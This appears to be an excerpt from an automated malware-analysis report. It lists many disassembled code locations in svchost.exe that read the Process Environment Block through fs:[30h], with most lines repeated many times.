Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AC730 mov eax, dword ptr fs:[00000030h]	2_2_035AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]	2_2_0356C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]	2_2_0356C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0353C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B07C3 mov eax, dword ptr fs:[00000030h]	2_2_035B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]	2_2_035347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]	2_2_035347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]	2_2_035527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]	2_2_035527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]	2_2_035527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_035BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D678E mov eax, dword ptr fs:[00000030h]	2_2_035D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035307AF mov eax, dword ptr fs:[00000030h]	2_2_035307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E47A0 mov eax, dword ptr fs:[00000030h]	2_2_035E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354C640 mov eax, dword ptr fs:[00000030h]	2_2_0354C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03562674 mov eax, dword ptr fs:[00000030h]	2_2_03562674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]	2_2_035F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]	2_2_035F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]	2_2_0356A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]	2_2_0356A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572619 mov eax, dword ptr fs:[00000030h]	2_2_03572619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE609 mov eax, dword ptr fs:[00000030h]	2_2_035AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E627 mov eax, dword ptr fs:[00000030h]	2_2_0354E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03566620 mov eax, dword ptr fs:[00000030h]	2_2_03566620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568620 mov eax, dword ptr fs:[00000030h]	2_2_03568620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353262C mov eax, dword ptr fs:[00000030h]	2_2_0353262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0356A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0356A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]	2_2_035B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]	2_2_035B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]	2_2_03534690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]	2_2_03534690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035666B0 mov eax, dword ptr fs:[00000030h]	2_2_035666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0356C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]	2_2_03538550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]	2_2_03538550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]	2_2_0356656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]	2_2_0356656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]	2_2_0356656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6500 mov eax, dword ptr fs:[00000030h]	2_2_035C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035365D0 mov eax, dword ptr fs:[00000030h]	2_2_035365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0356A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0356A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]	2_2_0356E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]	2_2_0356E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035325E0 mov eax, dword ptr fs:[00000030h]	2_2_035325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]	2_2_0356C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]	2_2_0356C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E59C mov eax, dword ptr fs:[00000030h]	2_2_0356E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532582 mov eax, dword ptr fs:[00000030h]	2_2_03532582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532582 mov ecx, dword ptr fs:[00000030h]	2_2_03532582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564588 mov eax, dword ptr fs:[00000030h]	2_2_03564588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]	2_2_035545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]	2_2_035545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]	2_2_035B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]	2_2_035B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]	2_2_035B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA456 mov eax, dword ptr fs:[00000030h]	2_2_035EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352645D mov eax, dword ptr fs:[00000030h]	2_2_0352645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355245A mov eax, dword ptr fs:[00000030h]	2_2_0355245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]	2_2_0355A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]	2_2_0355A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]	2_2_0355A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC460 mov ecx, dword ptr fs:[00000030h]	2_2_035BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]	2_2_03568402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]	2_2_03568402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]	2_2_03568402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A430 mov eax, dword ptr fs:[00000030h]	2_2_0356A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]	2_2_0352E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]	2_2_0352E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]	2_2_0352E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C427 mov eax, dword ptr fs:[00000030h]	2_2_0352C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035304E5 mov ecx, dword ptr fs:[00000030h]	2_2_035304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA49A mov eax, dword ptr fs:[00000030h]	2_2_035EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035644B0 mov ecx, dword ptr fs:[00000030h]	2_2_035644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_035BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035364AB mov eax, dword ptr fs:[00000030h]	2_2_035364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528B50 mov eax, dword ptr fs:[00000030h]	2_2_03528B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DEB50 mov eax, dword ptr fs:[00000030h]	2_2_035DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4B4B mov eax, dword ptr fs:[00000030h]	2_2_035E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4B4B mov eax, dword ptr fs:[00000030h]	2_2_035E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]	2_2_035C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]	2_2_035C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FAB40 mov eax, dword ptr fs:[00000030h]	2_2_035FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D8B42 mov eax, dword ptr fs:[00000030h]	2_2_035D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352CB7E mov eax, dword ptr fs:[00000030h]	2_2_0352CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604B00 mov eax, dword ptr fs:[00000030h]	2_2_03604B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]	2_2_0355EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]	2_2_0355EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]	2_2_035F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]	2_2_035F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_035DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]	2_2_03550BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]	2_2_03550BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]	2_2_03550BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]	2_2_03530BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]	2_2_03530BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]	2_2_03530BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]	2_2_03538BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]	2_2_03538BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]	2_2_03538BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EBFC mov eax, dword ptr fs:[00000030h]	2_2_0355EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_035BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]	2_2_03540BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]	2_2_03540BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_035E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_035E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]	2_2_03540A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]	2_2_03540A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]	2_2_035ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]	2_2_035ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]	2_2_0356CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]	2_2_0356CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]	2_2_0356CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DEA60 mov eax, dword ptr fs:[00000030h]	2_2_035DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BCA11 mov eax, dword ptr fs:[00000030h]	2_2_035BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]	2_2_03554A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]	2_2_03554A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA38 mov eax, dword ptr fs:[00000030h]	2_2_0356CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA24 mov eax, dword ptr fs:[00000030h]	2_2_0356CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EA2E mov eax, dword ptr fs:[00000030h]	2_2_0355EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530AD0 mov eax, dword ptr fs:[00000030h]	2_2_03530AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]	2_2_03564AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]	2_2_03564AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]	2_2_03586ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]	2_2_03586ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]	2_2_03586ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]	2_2_0356AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]	2_2_0356AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568A90 mov edx, dword ptr fs:[00000030h]	2_2_03568A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604A80 mov eax, dword ptr fs:[00000030h]	2_2_03604A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]	2_2_03538AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]	2_2_03538AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586AA4 mov eax, dword ptr fs:[00000030h]	2_2_03586AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0946 mov eax, dword ptr fs:[00000030h]	2_2_035B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604940 mov eax, dword ptr fs:[00000030h]	2_2_03604940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]	2_2_035D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]	2_2_035D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC97C mov eax, dword ptr fs:[00000030h]	2_2_035BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]	2_2_03556962
